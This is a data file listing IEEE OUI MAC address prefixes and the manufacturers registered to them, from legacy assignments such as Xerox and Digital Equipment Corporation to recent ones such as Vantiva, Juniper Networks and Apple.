MACRAIGOR SYSTEMS, INC. 0060A6 PARTICLE MEASURING SYSTEMS 00602A SYMICRON COMPUTER COMMUNICATIONS, LTD. 00A06C SHINDENGEN ELECTRIC MFG. CO., LTD. 00A01F TRICORD SYSTEMS, INC. 00A0FB Toray Engineering D Solutions Co., Ltd. 00A01A BINAR ELEKTRONIK AB 00A088 ESSENTIAL COMMUNICATIONS 00A0A7 VORAX CORPORATION 00A07E AVID TECHNOLOGY, INC. 00A081 ALCATEL DATA NETWORKS 00A0D4 RADIOLAN, INC. 00A08B ASTON ELECTRONIC DESIGNS LTD. 00A097 JC INFORMATION SYSTEMS 00A0B1 FIRST VIRTUAL CORPORATION 00A092 H. BOLLMANN MANUFACTURERS, LTD 00A0DB FISHER & PAYKEL PRODUCTION 00A0C2 R.A. SYSTEMS CO., LTD. 00A04B TFL LAN INC. 00A064 KVB/ANALECT 00A03E ATM FORUM 00A098 NetApp 00A073 COM21, INC. 00A03A KUBOTEK CORPORATION 00A0B2 SHIMA SEIKI 00A027 FIREPOWER SYSTEMS, INC. 00A046 SCITEX CORP. LTD. 00A06F Color Sentinel Systems, LLC 00A0C7 TADIRAN TELECOMMUNICATIONS 0020A0 OA LABORATORY CO., LTD. 00200D CARL ZEISS 00202D TAIYO CORPORATION 002091 J125, NATIONAL SECURITY AGENCY 0020BD NIOBRARA R & D CORPORATION 002054 Sycamore Networks 0020A7 PAIRGAIN TECHNOLOGIES, INC. 002072 WORKLINK INNOVATIONS 002021 ALGORITHMS SOFTWARE PVT. LTD. 002049 COMTRON, INC. 002050 KOREA COMPUTER INC. 002084 OCE PRINTING SYSTEMS, GMBH 0020EC TECHWARE SYSTEMS CORP. 00206E XACT, INC. 0020F1 ALTOS INDIA LIMITED 002041 DATA NET 002075 MOTOROLA COMMUNICATION ISRAEL 0020A5 API ENGINEERING 002064 PROTEC MICROSYSTEMS, INC. 002033 SYNAPSE TECHNOLOGIES, INC. 0020EA EFFICIENT NETWORKS, INC. 00206A OSAKA COMPUTER CORP. 00205C InterNet Systems of Florida, Inc. 002055 ALTECH CO., LTD. 00200A SOURCE-COMM CORP. 0020CF TEST & MEASUREMENT SYSTEMS INC 0020B4 TERMA ELEKTRONIK AS 0020E4 HSING TECH ENTERPRISE CO., LTD 0020A2 GALCOM NETWORKING LTD. 002031 Tattile SRL 0020D0 VERSALYNX CORPORATION 00206C EVERGREEN TECHNOLOGY CORP. 00205E CASTLE ROCK, INC. 002012 CAMTRONICS MEDICAL SYSTEMS 002076 REUDO CORPORATION 0020E8 DATATREK CORPORATION 0020C5 EAGLE TECHNOLOGY 002009 PACKARD BELL ELEC., INC. 002027 MING FORTUNE INDUSTRY CO., LTD 002010 JEOL SYSTEM TECHNOLOGY CO. LTD 00209F MERCURY COMPUTER SYSTEMS, INC. 0020CB PRETEC ELECTRONICS CORP. 0020EB CINCINNATI MICROWAVE, INC. 0020B9 METRICOM, INC. 002039 SCINETS 0020E2 INFORMATION RESOURCE ENGINEERING 002007 SFA, INC. 0020DB XNET TECHNOLOGY, INC. 00C015 NEW MEDIA CORPORATION 00C083 TRACE MOUNTAIN PRODUCTS, INC. 00C094 VMX INC. 00C0F9 Artesyn Embedded Technologies 00C075 XANTE CORPORATION 001C7C PERQ SYSTEMS CORPORATION 00C039 Teridian Semiconductor Corporation 00C0A9 BARRON MCCANN LTD. 00C0B5 CORPORATE NETWORK SYSTEMS,INC. 00C04B CREATIVE MICROSYSTEMS 00C0B9 FUNK SOFTWARE, INC. 00C05B NETWORKS NORTHWEST, INC. 00C008 SECO SRL 00C0B7 AMERICAN POWER CONVERSION CORP 00208A SONIX COMMUNICATIONS, LTD. 0020D2 RAD DATA COMMUNICATIONS, LTD. 002002 SERITECH ENTERPRISE CO., LTD. 00204B AUTOCOMPUTER CO., LTD. 00208C GALAXY NETWORKS, INC. 00202C WELLTRONIX CO., LTD. 0020BB ZAX CORPORATION 0020A8 SAST TECHNOLOGY CORP. 002045 ION Networks, Inc. 0020A6 Proxim Wireless 00C043 STRATACOM 00C0FC ELASTIC REALITY, INC. 00C0BB FORVAL CREATIVE, INC. 00C0E0 DSC COMMUNICATION CORP. 00C0DA NICE SYSTEMS LTD. 00C019 LEAP TECHNOLOGY, INC. 00C0CF IMATRAN VOIMA OY 00C07D RISC DEVELOPMENTS LTD. 00C027 CIPHER SYSTEMS, INC. 00C05C ELONEX PLC 00C0ED US ARMY ELECTRONIC 00C032 I-CUBED LIMITED 00C0A5 DICKENS DATA SYSTEMS 00C08D TRONIX PRODUCT DEVELOPMENT 00C02A OHKURA ELECTRIC CO., LTD. 00C0EF ABIT CORPORATION 00C061 SOLECTEK CORPORATION 00C0AD MARBEN COMMUNICATION SYSTEMS 00C07F NUPON COMPUTING CORP. 00C057 MYCO ELECTRONICS 00C056 SOMELEC 0040BD STARLIGHT NETWORKS, INC. 0040ED NETWORK CONTROLS INT'NATL INC. 0040E5 SYBUS CORPORATION 0040A5 CLINICOMP INTL. 004005 ANI COMMUNICATIONS INC. 0040D9 AMERICAN MEGATRENDS INC. 00C030 INTEGRATED ENGINEERING B. V. 00C0A6 EXICOM AUSTRALIA PTY. LTD 00C0CB CONTROL TECHNOLOGY CORPORATION 00C0D3 OLYMPUS IMAGE SYSTEMS, INC. 00C0E8 PLEXCOM, INC. 00C0D1 COMTREE TECHNOLOGY CORPORATION 00C038 RASTER IMAGE PROCESSING SYSTEM 00C0EB SEH COMPUTERTECHNIK GMBH 0040DB ADVANCED TECHNICAL SOLUTIONS 00409B HAL COMPUTER SYSTEMS INC. 0040EB MARTIN MARIETTA CORPORATION 00400E MEMOTEC, INC. 00C03D WIESEMANN & THEIS GMBH 00404C HYPERTEC PTY LTD. 00C092 MENNEN MEDICAL INC. 00C052 BURR-BROWN 00C028 JASCO CORPORATION 0040BA ALLIANT COMPUTER SYSTEMS CORP. 0040CE NET-SOURCE, INC. 004062 E-SYSTEMS, INC./GARLAND DIV. 004034 BUSTEK CORPORATION 0040C8 MILAN TECHNOLOGY CORPORATION 004021 RASTER GRAPHICS 0040C1 BIZERBA-WERKE WILHEIM KRAUT 0040E1 MARNER INTERNATIONAL, INC. 0040FE SYMPLEX COMMUNICATIONS 00401C AST RESEARCH, INC. 0040C2 APPLIED COMPUTING DEVICES 0040D4 GAGE TALKER CORP. 004038 TALENT ELECTRIC INCORPORATED 0040D8 OCEAN OFFICE AUTOMATION LTD. 004088 MOBIUS TECHNOLOGIES, INC. 0080AA MAXPEED 00C050 TOYO DENKI SEIZO K.K. 0040C6 FIBERNET RESEARCH, INC. 004032 DIGITAL COMMUNICATIONS 00400F DATACOM TECHNOLOGIES 008035 TECHNOLOGY WORKS, INC. 00804E APEX COMPUTER COMPANY 008055 FERMILAB 00802A TEST SYSTEMS & SIMULATIONS INC 00807E SOUTHERN PACIFIC LTD. 0080EF RATIONAL 0080F0 Panasonic Communications Co., Ltd. 008051 FIBERMUX 0080C6 NATIONAL DATACOMM CORPORATION 004006 SAMPO TECHNOLOGY CORPORATION 004047 WIND RIVER SYSTEMS 004050 IRONICS, INCORPORATED 0080C0 PENRIL DATACOMM 004041 FUJIKURA LTD. 008093 XYRON CORPORATION 008092 Silex Technology, Inc. 00805A TULIP COMPUTERS INTERNAT'L B.V 00001E TELSIST INDUSTRIA ELECTRONICA 000050 RADISYS CORPORATION 00802E CASTLE ROCK COMPUTING 0080F2 RAYCOM SYSTEMS INC 0080BD THE FURUKAWA ELECTRIC CO., LTD 008025 Telit Wireless Solutions GmbH 0080EA ADVA Optical Networking Ltd. 008000 MULTITECH SYSTEMS, INC. 008069 COMPUTONE SYSTEMS 008004 ANTLOW COMMUNICATIONS, LTD. 0080D0 COMPUTER PERIPHERALS, INC. 008024 KALPANA, INC. 008040 JOHN FLUKE MANUFACTURING CO. 008021 Alcatel Canada Inc. 0080E8 CUMULUS CORPORATIION 00801D INTEGRATED INFERENCE MACHINES 008075 PARSYTEC GMBH 00800D VOSSWINKEL F.U. 0080D1 KIMTRON CORPORATION 008042 Artesyn Embedded Technologies 0080ED IQ TECHNOLOGIES, INC. 00809A NOVUS NETWORKS LTD 00804A PRO-LOG 00009A RC COMPUTER A/S 00004B ICL DATA OY 0000E0 QUADRAM CORP. 000027 JAPAN RADIO COMPANY 0000E8 ACCTON TECHNOLOGY CORP. 00002F TIMEPLEX INC. 0000E6 APTOR PRODUITS DE COMM INDUST 000066 TALARIS SYSTEMS, INC. 000049 APRICOT COMPUTERS, LTD 0000FA MICROSAGE COMPUTER SYSTEMS INC 0000D4 PURE DATA LTD. 000019 APPLIED DYNAMICS INTERNATIONAL 0000AB LOGIC MODELING CORPORATION 00004F LOGICRAFT, INC. 000015 DATAPOINT CORPORATION 00001C BELL TECHNOLOGIES 000034 NETWORK RESOURCES CORPORATION 000022 VISUAL TECHNOLOGY INC. 0000B5 DATABILITY SOFTWARE SYS. INC. 00004D DCI CORPORATION 00006F Madge Ltd. 000078 LABTAM LIMITED 00005A SysKonnect GmbH 000071 ADRA SYSTEMS INC. 000023 ABB INDUSTRIAL SYSTEMS AB 0000E7 Star Gate Technologies 000018 WEBSTER COMPUTER CORPORATION 0000D5 MICROGNOSIS INTERNATIONAL 00003A CHYRON CORPORATION 0000BE THE NTI GROUP 0000D9 NIPPON TELEGRAPH & TELEPHONE 0080AC IMLOGIX, DIVISION OF GENESYS 000059 Hellige GMBH 000069 CONCORD COMMUNICATIONS INC 000073 SIECOR CORPORATION 0000B9 MCDONNELL DOUGLAS COMPUTER SYS 0000BF SYMMETRIC COMPUTER SYSTEMS 08002A MOSAIC TECHNOLOGIES INC. 080024 10NET COMMUNICATIONS/DCA 080022 NBI INC. 080020 Oracle Corporation 08001F SHARP CORPORATION 020701 RACAL-DATACOM 080006 SIEMENS AG 000080 CRAY COMMUNICATIONS A/S 080089 Kinetics 080086 KONICA MINOLTA HOLDINGS, INC. 080083 Seiko Instruments Inc. 080049 UNIVATION 00002D CHROMATICS INC 080058 SYSTEMS CONCEPTS 080061 JAROGATE LTD. 08005F SABER TECHNOLOGY CORP. AA0001 DIGITAL EQUIPMENT CORPORATION AA0002 DIGITAL EQUIPMENT CORPORATION 080014 EXCELAN 080065 GENRAD INC. 000007 XEROX CORPORATION 00801F KRUPP ATLAS ELECTRONIK GMBH 02AA3C OLIVETTI TELECOMM SPA (OLTECO) 080059 A/S MYCRON 04E0C4 TRIUMPH-ADLER AG 080013 Exxon 021C7C PERQ SYSTEMS CORPORATION 000005 XEROX CORPORATION 00DD08 UNGERMANN-BASS INC. AA0000 DIGITAL EQUIPMENT CORPORATION 000009 XEROX CORPORATION 0080E9 Madge Ltd. 0040D6 LOCAMATION B.V. 08004B Planning Research Corp. E068EE Phyplus Microelectronics Limited 60C9AA Nokia 080008 BOLT BERANEK AND NEWMAN INC. E87640 SKY UK LIMITED 6879DD Omnipless Manufacturing (PTY) Ltd F854F6 AzureWave Technology Inc. 087458 Fiberhome Telecommunication Technologies Co.,LTD 3410F4 Silicon Laboratories C482E1 Tuya Smart Inc. 00E04D INTERNET INITIATIVE JAPAN, INC 64009C Insulet Corporation 605699 MAGNETI MARELLI S.E. S.p.A. A82C3E Shenzhen Cultraview Digital Technology Co., Ltd F0C558 U.D.Electronic Corp. 743AEF Kaon Group Co., Ltd. 24E4CE Kaon Group Co., Ltd. B0F00C Dongguan Wecxw CO.,Ltd. A8E539 Nurivoice Co., Ltd A8584E PK VEGA C47EE0 Cisco Systems, Inc ACED32 Extreme Networks, Inc. D0F928 zte corporation A8FB40 Nokia Solutions and Networks GmbH & Co. KG 2C9975 Samsung Electronics Co.,Ltd 1C7C98 NEC Platforms, Ltd. 38922E ArrayComm 186A81 Sagemcom Broadband SAS A07F8A Sagemcom Broadband SAS 0438DC China Unicom Online Information Technology Co.,Ltd DCBDCC Quectel Wireless Solutions Co.,Ltd. B096EA GD Midea Air-Conditioning Equipment Co.,Ltd. 68DECE Fiberhome Telecommunication Technologies Co.,LTD 1091D1 Intel Corporate 6C4CE2 Intel Corporate A800E3 Starkey Labs Inc. 38315A Rinnai 3C19CB TECNO MOBILE LIMITED FCFA21 zte corporation 00EE01 Enablers Solucoes e Consultoria em Dispositivos 80F0CF Ruckus Wireless FCB467 Espressif Inc. D8BC38 Espressif Inc. D07CB2 Sigmastar Technology Ltd. A4BD7E HMD Global Oy D0CEC9 HAN CHANG 68DA73 IEEE Registration Authority 905851 Vantiva USA LLC 087E64 Vantiva USA LLC 1033BF Vantiva USA LLC 6C55E8 Vantiva USA LLC 889E68 Vantiva USA LLC 7C9A54 Vantiva USA LLC E03717 Vantiva USA LLC D05A00 Vantiva USA LLC 3C9A77 Vantiva USA LLC 087073 HUAWEI TECHNOLOGIES CO.,LTD E4DE40 Aruba, a Hewlett Packard Enterprise Company F85E42 Vantiva USA LLC 08952A Vantiva USA LLC FC528D Vantiva USA LLC 28BE9B Vantiva USA LLC 4432C8 Vantiva USA LLC 5C22DA Vantiva USA LLC 00651E Amcrest Technologies EC937D Vantiva USA LLC D4E2CB Vantiva USA LLC 8CD08B WuXi Rigosys Technology Co.,LTD B8C065 Universal Electronics, Inc. 94F929 Meta Platforms Technologies, LLC 2091DF Apple, Inc. A89C78 Apple, Inc. 7C6130 Apple, Inc. 80B989 Apple, Inc. C4524F Apple, Inc. 603E5F Apple, Inc. C07C90 Shenzhen YOUHUA Technology Co., Ltd 003969 Air-Weigh Incorporated 00E63A Ruckus Wireless 6C68A4 Guangzhou V-Solution Telecommunication Technology Co.,Ltd. 848687 weiyuantechnology 000CEC Safran Trusted 4D Inc. 58D312 zte corporation D8097F zte corporation 44B59C Tenet Networks Private Limited 38F6ED EVK DI Kerschhaggl GmbH 44E761 Infinix mobility limited 3C2D9E Vantiva - Connected Home A436C7 LG Innotek D82D40 Janz - Contagem e Gestão de Fluídos S.A. 2C3EBF HOSIN Global Electronics Co., Ltd. 40D563 HANA Electronics 005001 YAMASHITA SYSTEMS CORP. 6CEEF7 shenzhen scodeno technology co., Ltd. F02178 UNIONMAN TECHNOLOGY CO.,LTD 98CCF3 Amazon Technologies Inc. 5091E3 TP-Link Corporation Limited 9CFB77 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 643E0A HUAWEI TECHNOLOGIES CO.,LTD 001457 Nevion B440DC Samsung Electronics Co.,Ltd 6417CD Samsung Electronics Co.,Ltd DC69E2 Samsung Electronics Co.,Ltd C05064 SHENNAN CIRCUITS CO.,LTD 348818 Cisco Systems, Inc DC2DDE Ledworks SRL 402A8F Shanghai High-Flying Electronics Technology Co., Ltd 947918 ITEL MOBILE LIMITED 68F0B5 Honor Device Co., Ltd. 101849 WEIFANG GOERTEK ELECTRONICS CO.,LTD E4FAC4 Big Field Global PTE. Ltd. 08F9E0 Espressif Inc. 44053F Sagemcom Broadband SAS 80802C Fortinet, Inc. 0036D7 Keltron IOT Corp. 34DC99 New H3C Technologies Co., Ltd 5CE8D3 Signalinks Communication Technology Co., Ltd 4831B7 Espressif Inc. 543204 Espressif Inc. B03893 Onda TLC Italia S.r.l. B86061 China Mobile Group Device Co.,Ltd. 700692 IEEE Registration Authority 8CDF2C vivo Mobile Communication Co., Ltd. F87928 zte corporation EC2C73 Apple, Inc. 7CC06F Apple, Inc. EC8150 Apple, Inc. D42FCA Apple, Inc. D058A5 Apple, Inc. 348511 Shenzhen Skyworth Digital Technology CO., Ltd F8B8B4 Shenzhen Skyworth Digital Technology CO., Ltd B09738 Shenzhen Skyworth Digital Technology CO., Ltd 1C880C Shenzhen Skyworth Digital Technology CO., Ltd 681AA4 Shenzhen Skyworth Digital Technology CO., Ltd 48555E Shenzhen Skyworth Digital Technology CO., Ltd D88ED4 eero inc. 943FD6 Apple, Inc. 28C1A0 Apple, Inc. CCB54C Texas Instruments 74A58C Texas Instruments 3CE002 Texas Instruments 98038A Texas Instruments 984B06 HUAWEI TECHNOLOGIES CO.,LTD ACFF6B HUAWEI TECHNOLOGIES CO.,LTD 38AB16 NPO RTT LLC 38B5C9 INGRAM MICRO SERVICES 2C67AB EZELINK TELECOM 2CD7FF LANCOM Systems GmbH 844DBE Fiberhome Telecommunication Technologies Co.,LTD 80B946 Nokia F8CAB8 Dell Inc. 002067 Private ACDE48 Private 0050C7 Private 7486E2 Dell Inc. 00BE43 Dell Inc. 605B30 Dell Inc. C84BD6 Dell Inc. E8655F Dell Inc. E8B265 Dell Inc. AC91A1 Dell Inc. C4CBE1 Dell Inc. 247152 Dell Inc. 8C47BE Dell Inc. 601895 Dell Inc. B04F13 Dell Inc. 381428 Dell Inc. F4EE08 Dell Inc. 908D6E Dell Inc. EC2A72 Dell Inc. 18DBF2 Dell Inc. 14B31F Dell Inc. 107D1A Dell Inc. 509A4C Dell Inc. 405CFD Dell Inc. D09466 Dell Inc. D89EF3 Dell Inc. 0024E8 Dell Inc. 002219 Dell Inc. B4E10F Dell Inc. 1866DA Dell Inc. 106530 Dell Inc. 3C2C30 Dell Inc. 886FD4 Dell Inc. 5CF9DD Dell Inc. 004E01 Dell Inc. 00188B Dell Inc. F01FAF Dell Inc. 18A99B Dell Inc. F8BC12 Dell Inc. 3417EB Dell Inc. 44A842 Dell Inc. 4C7625 Dell Inc. 001143 Dell Inc. 001372 Dell Inc. B083FE Dell Inc. 000874 Dell Inc. CC62FE UNION MAN TECHNOLOGY CO.,LTD 94CBCD zte corporation 805F8E Huizhou BYD Electronic Co., Ltd. A83A79 Mist Systems, Inc. A852D4 Aruba, a Hewlett Packard Enterprise Company 5030F4 Exascend, Inc. DCECE3 LYOTECH LABS LLC E49069 Rockwell Automation 184C08 Rockwell Automation 404101 Rockwell Automation 68C8EB Rockwell Automation 5488FE Xiaoniu network technology (Shanghai) Co., Ltd. F4D580 YAMAHA CORPORATION C09573 AIxLink FC35E6 Visteon Corporation 8CBA25 UNION MAN TECHNOLOGY CO.,LTD 54725E UNION MAN TECHNOLOGY CO.,LTD F814FE UNION MAN TECHNOLOGY CO.,LTD 5C345B Hangzhou Hikvision Digital Technology Co.,Ltd. 40F21C DZS Inc. 00180C DZS Inc. 00E0DF DZS Inc. 00A01B DZS Inc. D09395 IEEE Registration Authority F412DA zte corporation 7CBFAE Renesas Electronics (Penang) Sdn. Bhd. 80AFCA Shenzhen Cudy Technology Co., Ltd. 1C6E74 EnOcean Edge Inc. B417A8 Meta Platforms Technologies, LLC C04884 Sigma Bilisim Sist. Tekn. Elk. Enj. ve San. D??. Tic. Ltd. ?ti. 04472A Palo Alto Networks 4825F3 Huawei Device Co., Ltd. 7C8931 Huawei Device Co., Ltd. C02C17 Cisco Systems, Inc 984925 Juniper Networks 4419B6 Hangzhou Hikvision Digital Technology Co.,Ltd. 4CBD8F Hangzhou Hikvision Digital Technology Co.,Ltd. BC5E33 Hangzhou Hikvision Digital Technology Co.,Ltd. FC9FFD Hangzhou Hikvision Digital Technology Co.,Ltd. E8A0ED Hangzhou Hikvision Digital Technology Co.,Ltd. 7CEDC6 Amazon Technologies Inc. 540295 HUAWEI TECHNOLOGIES CO.,LTD C8787D D-Link Corporation 942A6F Ubiquiti Inc F4E2C6 Ubiquiti Inc D8B370 Ubiquiti Inc B0A732 Espressif Inc. B0B21C Espressif Inc. E09B27 Ciena Corporation 8CE042 vivo Mobile Communication Co., Ltd. 384F49 Juniper Networks 5800BB Juniper Networks D007CA Juniper Networks D8B122 Juniper Networks 64C3D6 Juniper Networks 88A25E Juniper Networks 003146 Juniper Networks 407183 Juniper Networks 40B4F0 Juniper Networks B4FBE4 Ubiquiti Inc 687251 Ubiquiti Inc FCECDA Ubiquiti Inc 78FE3D Juniper Networks 648788 Juniper Networks AC4BC8 Juniper Networks 3C94D5 Juniper Networks DC38E1 Juniper Networks CCE17F Juniper Networks 541E56 Juniper Networks 54B7BD Arcadyan Corporation BC73A4 ANDA TELECOM PVT LTD 14F5F9 HUNAN FN-LINK TECHNOLOGY LIMITED FC5703 Hisense broadband multimedia technology Co.,Ltd 001AA6 Elbit Systems Deutschland GmbH & Co. KG 94F524 Chengdu BeiZhongWangXin Technology Co.Ltd 60FAB1 Kempower Oyj 9CC893 Juniper Networks 58E434 Juniper Networks B0EB7F Juniper Networks 28B829 Juniper Networks C0BFA7 Juniper Networks B033A6 Juniper Networks 201BC9 Juniper Networks 807FF8 Juniper Networks 50C709 Juniper Networks 00C52C Juniper Networks B48A5F Juniper Networks E897B8 Chiun Mai Communication System, Inc E0F62D Juniper Networks EC7C5C Juniper Networks C0EAC3 IEEE Registration Authority FCA0F3 HUAWEI TECHNOLOGIES CO.,LTD 04A81C HUAWEI TECHNOLOGIES CO.,LTD 304074 zte corporation A01077 zte corporation 7C7A3C New H3C Technologies Co., Ltd AC1754 tiko Energy Solutions AG ACE0D6 koreabts A4C23E Huizhou Speed Wireless Technology Co.,Ltd 483177 Nintendo Co.,Ltd 140FA6 Renesas Electronics (Penang) Sdn. Bhd. 148473 Cisco Systems, Inc B4636F Nokia Solutions and Networks GmbH & Co. KG 24D337 Xiaomi Communications Co Ltd 1CCA41 AO 347DE4 SHENZHEN BILIAN ELECTRONIC CO.,LTD CCCF83 CIG SHANGHAI CO LTD 7C45F9 IEEE Registration Authority 0050C4 IMD 10CF0F Apple, Inc. 3C3B4D Toyo Seisakusho Kaisha, Limited 3CBCD0 zte corporation 646E60 zte corporation 4C421E Cisco Systems, Inc 90314B AltoBeam Inc. D8638C Shenzhen Dttek Technology Co., Ltd. 1C76F2 Samsung Electronics Co.,Ltd 0092A5 LG Innotek D039FA Samsung Electronics Co.,Ltd B40B1D Samsung Electronics Co.,Ltd AC80FB Samsung Electronics Co.,Ltd 14DD02 Liangang Optoelectronic Technology CO., Ltd. 60C727 Digiboard Eletronica da Amazonia Ltda 04F778 Sony Interactive Entertainment Inc. 147F0F Texas Instruments 64B2B4 Fiberhome Telecommunication Technologies Co.,LTD 4831DB Huawei Device Co., Ltd. 205F3D Adtran Inc D0A9D3 EM Microelectronic 189EAD Shenzhen Chengqian Information Technology Co., Ltd 94DDF8 Brother Industries, LTD. 84B386 IEEE Registration Authority 444AD6 Shenzhen Rinocloud Technology Co.,Ltd. A45D5E Wilk Elektronik S.A. 58707F Ericsson AB 408EF6 Infinix mobility limited E02DF0 ALPSALPINE CO,.LTD 98BFF4 MARKIN co., Ltd. 044BA5 SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. FC315D Apple, Inc. 74A6CD Apple, Inc. 2C7CF2 Apple, Inc. 30D7A1 Apple, Inc. 887477 HUAWEI TECHNOLOGIES CO.,LTD B4E265 Shenzhen SDMC Technology CO.,Ltd. E0382D IEEE Registration Authority 68FCB6 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 9C558F Lockin Technology(Beijing) Co.,Ltd. A8727E WISDRI (wuhan) Automation Company Limited 00C28F Allied Telesis K.K. 3847F2 Recogni Inc D8AD49 Honor Device Co., Ltd. 38F8F6 Adtran Inc F42D06 zte corporation 1C674A zte corporation 7C5758 HP Inc. C829C8 Palo Alto Networks 9C5322 TP-Link Corporation Limited 482254 TP-Link Corporation Limited DCD2FD HUAWEI TECHNOLOGIES CO.,LTD 5873D1 HUAWEI TECHNOLOGIES CO.,LTD 4CB087 HUAWEI TECHNOLOGIES CO.,LTD 88B4BE HUAWEI TECHNOLOGIES CO.,LTD 947BAE Xiaomi Communications Co Ltd 78605B TP-LINK TECHNOLOGIES CO.,LTD. 04F9F8 TP-LINK TECHNOLOGIES CO.,LTD. B484D5 GooWi Wireless Technology Co., Limited 54077D NETGEAR C45379 Micronview Limited Liability Company 804AF2 Sonos, Inc. E8268D Shenzhen SuperElectron Technology Co.,Ltd. D8312C zte corporation 049F15 Humane 3838A6 Arista Networks 50236D Nintendo Co.,Ltd A03975 Leo Bodnar Electronics Ltd 7493DA ASKEY COMPUTER CORP C84AA0 Sony Interactive Entertainment Inc. 4C968A Wacom Co.,Ltd. 90395E Silicon Laboratories C8F2B4 Guizhou Huaxin Information Technology Co., Ltd. E0A1CE zte corporation 24A6FA WEIFANG GOERTEK ELECTRONICS CO.,LTD EC83B7 PUWELL CLOUD TECH LIMITED 0C6422 Beijing Wiseasy Technology Co.,Ltd. 2C75CB Novitec Co., Ltd. F42756 DASAN Newtork Solutions 10BBF3 HUNAN FN-LINK TECHNOLOGY LIMITED D04E99 HUAWEI TECHNOLOGIES CO.,LTD 20A766 HUAWEI TECHNOLOGIES CO.,LTD 3C058E HUAWEI TECHNOLOGIES CO.,LTD 201A94 Apple, Inc. B0E5EF Apple, Inc. 288FF6 Apple, Inc. 5027A9 eero inc. A411BB Cisco Systems, Inc 504921 Cisco Systems, Inc 58B965 Apple, Inc. 743174 Apple, Inc. F0C725 Apple, Inc. 6C9106 Katena Computing Technologies C87F54 ASUSTek COMPUTER INC. 6C70CB Samsung Electronics Co.,Ltd 907BC6 Texas Instruments 904846 Texas Instruments C47905 Zhejiang Uniview Technologies Co.,Ltd. D4DA21 Beijing Xiaomi Mobile Software Co., Ltd ECDA3B Espressif Inc. D4ADFC Shenzhen Intellirocks Tech co.,ltd BCB923 Alta Networks 44B7D0 Microchip Technology Inc. E88F6F TCT mobile ltd 84FCE6 Espressif Inc. 6444D5 TD Tech F8AAB3 DESSMANN (China) Machinery & Electronic Co., Ltd B43522 Silicon Laboratories 94F392 Fortinet, Inc. BC026E Silicon Laboratories 8C8442 Cisco Systems, Inc 84F117 Newseason B4E46B China Mobile IOT Company Limited CCCC77 Zaram Technology. Inc. BC458C Shenzhen Topwise Communication Co.,Ltd 947806 NINGBO SUNVOT TECHNOLOGY CO.,LTD C8EFBC Inspur Communication Technology Co.,Ltd. 98CCE4 Shenzhen Mindray Animal Medical Technology Co.,LTD 3C0664 Beijing Leagrid Technology Co.,Ltd. BC5274 Samsung Electronics Co.,Ltd 784F24 Taicang T&W Electronics 6813E2 Eltex Enterprise LTD 9C5467 Nokia B46142 HUAWEI TECHNOLOGIES CO.,LTD 7C669A HUAWEI TECHNOLOGIES CO.,LTD CC1E97 HUAWEI TECHNOLOGIES CO.,LTD 9009DF Intel Corporate E40D36 Intel Corporate 149F43 Cisco Meraki 2C08B4 Huawei Device Co., Ltd. 5007C3 Amazon Technologies Inc. 64DB38 zte corporation ECDFC9 Hangzhou Microimage Software Co., Ltd 3CE441 Amazon Technologies Inc. 444201 Amazon Technologies Inc. E46D7F Ciena Corporation 848DCE Ciena Corporation E466AB zte corporation 80276C Cisco Systems, Inc 6C4EF6 Cisco Systems, Inc 5C2763 Itibia Technologies A0957F SERNET (SUZHOU) TECHNOLOGIES CORPORATION 64135A Itectra A/S C02E26 iRhythm Technologies, Inc. 4C5CDF ITEL MOBILE LIMITED BCE001 SHENZHEN NETIS TECHNOLOGY CO.,LTD FC22D3 FDSYS 00234B Inyuan Technology Inc. 00176E DUCATI SISTEMI 1C6A76 Apple, Inc. 6C7E67 Apple, Inc. A4C6F0 Apple, Inc. A88FD9 Apple, Inc. 089542 Apple, Inc. 54E1B6 Renesas Electronics (Penang) Sdn. Bhd. CC77C9 Fiberhome Telecommunication Technologies Co.,LTD 2C572C Allwinner Technology Co., Ltd 40C1F6 Shenzhen Jingxun Technology Co., Ltd. B40421 zte corporation E84368 zte corporation 0030AF Honeywell GmbH 504877 Honor Device Co., Ltd. F85C7E Shenzhen Honesty Electronics Co.,Ltd. F824E4 Beyonics Technology Electronic (Changshu) Co., Ltd 78C1AE Hangzhou Ezviz Software Co.,Ltd. 1CB8BA XIAMEN LEELEN TECHNOLOGY CO., LTD F0CCE0 Shenzhen All-Smartlink Technology Co.,Ltd. 44E2F1 NewRadio Technologies Co. , Ltd. D85482 Oxit, LLC C4EFDA Honeywell D8F507 Fiberhome Telecommunication Technologies Co.,LTD BC107B Samsung Electronics Co.,Ltd D4AD20 Jinan USR IOT Technology Limited 30C6D7 New H3C Technologies Co., Ltd F40595 Sagemcom Broadband SAS E49C67 Apple, Inc. 64E220 Qisda Corporation D4F242 Huawei Device Co., Ltd. 1CFC17 Cisco Systems, Inc 10AE60 Amazon Technologies Inc. EC74D7 Grandstream Networks Inc 28011C zte corporation 306371 Shenzhenshi Xinzhongxin Technology Co.Ltd A08CF2 YINUOLINK CO.,LTD 40475E eero inc. B07839 GD Midea Air-Conditioning Equipment Co.,Ltd. 749E75 Aruba, a Hewlett Packard Enterprise Company F41C71 SHENZHEN SANMU COMMUNICATION TECHNOLOGY CO., LTD 70110E zte corporation 98818A Huawei Device Co., Ltd. A8AA7C Huawei Device Co., Ltd. B4C2F7 Huawei Device Co., Ltd. E05A1B Espressif Inc. 488AE8 vivo Mobile Communication Co., Ltd. CCBA6F HUAWEI TECHNOLOGIES CO.,LTD E886CF Nokia 0025DF Taser International Inc. C8848C Ruckus Wireless 20E6DF eero inc. F4931C Universal Electronics, Inc. 785C5E HUAWEI TECHNOLOGIES CO.,LTD 1C3283 COMTTI Intelligent Technology(Shenzhen) Co., Ltd. 288EEC Apple, Inc. 8812AC HUNAN FN-LINK TECHNOLOGY LIMITED 5C3E1B Apple, Inc. 7C2ACA Apple, Inc. 74375F SERCOMM PHILIPPINES INC C82AF1 TCT mobile ltd 3CE90E Espressif Inc. A842E3 Espressif Inc. D49B74 Kinetic Technologies 480EEC TP-LINK TECHNOLOGIES CO.,LTD. 503EAA TP-LINK TECHNOLOGIES CO.,LTD. 3CFEAC Cisco Systems, Inc 04A741 Cisco Systems, Inc 98A2C0 Cisco Systems, Inc 00410E CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. FC6179 IEEE Registration Authority 08B61F Espressif Inc. 3C4E56 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD 50F261 Photon Sail Technologies 944E5B Ubee Interactive Co., Limited B4BA9D SKY UK LIMITED E08614 Novatel Wireless Solutions, Inc. 